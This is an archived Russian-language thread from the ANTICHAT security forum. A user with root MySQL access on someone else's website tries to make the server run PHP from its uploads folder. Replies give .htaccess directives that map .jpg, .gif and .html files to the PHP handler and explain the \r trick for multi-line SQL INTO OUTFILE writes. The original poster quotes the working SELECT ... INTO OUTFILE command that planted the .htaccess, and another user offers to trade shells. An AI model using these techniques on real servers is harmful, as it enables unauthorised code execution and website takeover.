HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Песочница
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 07.04.2012, 22:03
Pirotexnik
Постоянный
Регистрация: 13.10.2010
Сообщений: 375
Провел на форуме:
97332

Репутация: 38
По умолчанию

Добрый день.

Я вобщем, как обычно

Суть такая:

Есть root доступ к MySql на сервере с сайтом.

Могу писать, читать и тд.

Проблемма вот в чем.

1) Все диры кроме /uploads - Error 13 (не хватает прав)

2) В дире /uploads много подпапок.

3) Из них нельзя запускать *.php (и подобные)

4) Пытаюсь создать .htaccess

Цитата:
Сообщение от None  
AddHandler application/x-httpd-php .php .htm .html
5) такой .htaccess не помог.

6) другое содержание

Цитата:
Сообщение от None  

AddType application/x-httpd-php .gif

Почему-то записалось так

Цитата:
Сообщение от None  

\
AddType application/x-httpd-php .gif
\

Есть идеи?

Спасибо.
 
Ответить с цитированием

  #2  
Старый 07.04.2012, 22:52
Га-Ноцри
Постоянный
Регистрация: 16.10.2011
Сообщений: 326
Провел на форуме:
103014

Репутация: 76
По умолчанию

Меня иногда выручала подобная конструкция:

PHP код:
[COLOR="#000000"][COLOR="#0000BB"]php_flag engine on[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]либо php engine on[/COLOR][COLOR="#007700"])

[/
COLOR][COLOR="#0000BB"]AddType application[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]x[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]httpd[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]php[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]phtml[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]jpg[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]html

AddHandler application
[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]x[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]httpd[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]php[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]phtml[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]jpg[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]html[/COLOR][/COLOR
А, ну и еще можно использовать PHP включения в .html файлах при помощи такого .htaccess

PHP код:
[COLOR="#000000"][COLOR="#0000BB"]RemoveHandler[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]html[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]htm

AddType application
[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]x[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]httpd[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]php[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]php[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]htm[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]html[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]phtml[/COLOR][/COLOR
 
Ответить с цитированием

  #3  
Старый 07.04.2012, 23:04
Pirotexnik
Постоянный
Регистрация: 13.10.2010
Сообщений: 375
Провел на форуме:
97332

Репутация: 38
По умолчанию

При записе НЕСКОЛЬКИХ строк появляются слэши.

Нужно что-то, что будет работать в 1 строку. Либо как решить эту проблемму.
 
Ответить с цитированием

  #4  
Старый 07.04.2012, 23:06
Га-Ноцри
Постоянный
Регистрация: 16.10.2011
Сообщений: 326
Провел на форуме:
103014

Репутация: 76
По умолчанию

Цитата:
Сообщение от Pirotexnik  
При записе НЕСКОЛЬКИХ строк появляются слэши.
Нужно что-то, что будет работать в 1 строку. Либо как решить эту проблемму.
Записать в одну строку

PHP код:
[COLOR="#000000"][COLOR="#0000BB"]php_flag engine on[/COLOR][/COLOR
и попробовать выполнить .php или .phtml
 
Ответить с цитированием

  #5  
Старый 08.04.2012, 01:17
Pirotexnik
Постоянный
Регистрация: 13.10.2010
Сообщений: 375
Провел на форуме:
97332

Репутация: 38
По умолчанию

php

Цитата:
Сообщение от None  
403 Forbidden
shtml

Открывается, но не выполняется.
 
Ответить с цитированием

  #6  
Старый 08.04.2012, 01:59
Га-Ноцри
Постоянный
Регистрация: 16.10.2011
Сообщений: 326
Провел на форуме:
103014

Репутация: 76
По умолчанию

Цитата:
Сообщение от Pirotexnik  
php
shtml
Открывается, но не выполняется.
Ты будешь смеяться, но у меня буквально пару часов назад, один в один, была подобная ситуация - только вместо невозможности написать .htaccess в несколько строк, у меня просто выскакивала 500 ошибка при попытке записать php engine on. Боюсь, все дело в грамотно настроенном httpd.conf и/или корневом .htaccess. В итоге я плюнул на это дело и пошел за пивом.

Так что, боюсь, на этом моя фантазия исчерпана и я не знаю, как помочь в твоем случае
 
Ответить с цитированием

  #7  
Старый 08.04.2012, 02:10
Pirotexnik
Постоянный
Регистрация: 13.10.2010
Сообщений: 375
Провел на форуме:
97332

Репутация: 38
По умолчанию

.htaccess перенастраивает свойства диры, в которой лежит, и всех вложенных.

Похоже, прийдется забивать
 
Ответить с цитированием

  #8  
Старый 08.04.2012, 03:26
asiaman
Новичок
Регистрация: 04.08.2011
Сообщений: 27
Провел на форуме:
10268

Репутация: 0
По умолчанию

Цитата:
Сообщение от Pirotexnik  
.htaccess перенастраивает свойства диры, в которой лежит, и всех вложенных.
Похоже, прийдется забивать
а перл и др. скрипты могут выполниться? что на сервере есть? и какие модули апача стоят?

если будешь забивать совсем. то можешь скинуть в личку, я пораскину мозгами. в замен тоже какой-нить шелл дам, если нужно.

просто читать статьи - в одно ухо называется. без практики на завтра уже и не вспомню как да чего читал((

да и ты когда-то про форум движок Дискуз статью писал. Я некоторые азиатские языки знаю. и тоже на некоторых азиатских бордах есть. так вот Дискуз - китайский двиг. под Дискуз в чайна-нете есть сплойты. но азиаты в осовном на вин-системы ориентируются.

если что пиши в личку. жаба тоже есть)
 
Ответить с цитированием

  #9  
Старый 08.04.2012, 09:38
Expl0ited
Познавший АНТИЧАТ
Регистрация: 16.07.2010
Сообщений: 1,022
Провел на форуме:
262707

Репутация: 935


По умолчанию

в качестве переноса строки нужно использовать \r

select "test\rtest2" into outfile '/путь/1.txt'

Код:
cat 1.txt
test
test2
если использовать \n то получится:

Код:
cat 2.txt
test\
test2
 
Ответить с цитированием

  #10  
Старый 08.04.2012, 12:09
Pirotexnik
Постоянный
Регистрация: 13.10.2010
Сообщений: 375
Провел на форуме:
97332

Репутация: 38
По умолчанию

Цитата:
Сообщение от None  
select 'php_flag engine on \rAddType application/x-httpd-php .phtml .jpg .html \rAddHandler application/x-httpd-php .phtml .jpg .html \r \rAddType application/x-httpd-php .gif \r' INTO OUTFILE '/home/*/public_html/members/uploads/xx_02/.htaccess'
Создался нормально!

.php - 403

.shtml - не выполняется

.jpg - не выполняется

.gif - не выполняется
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.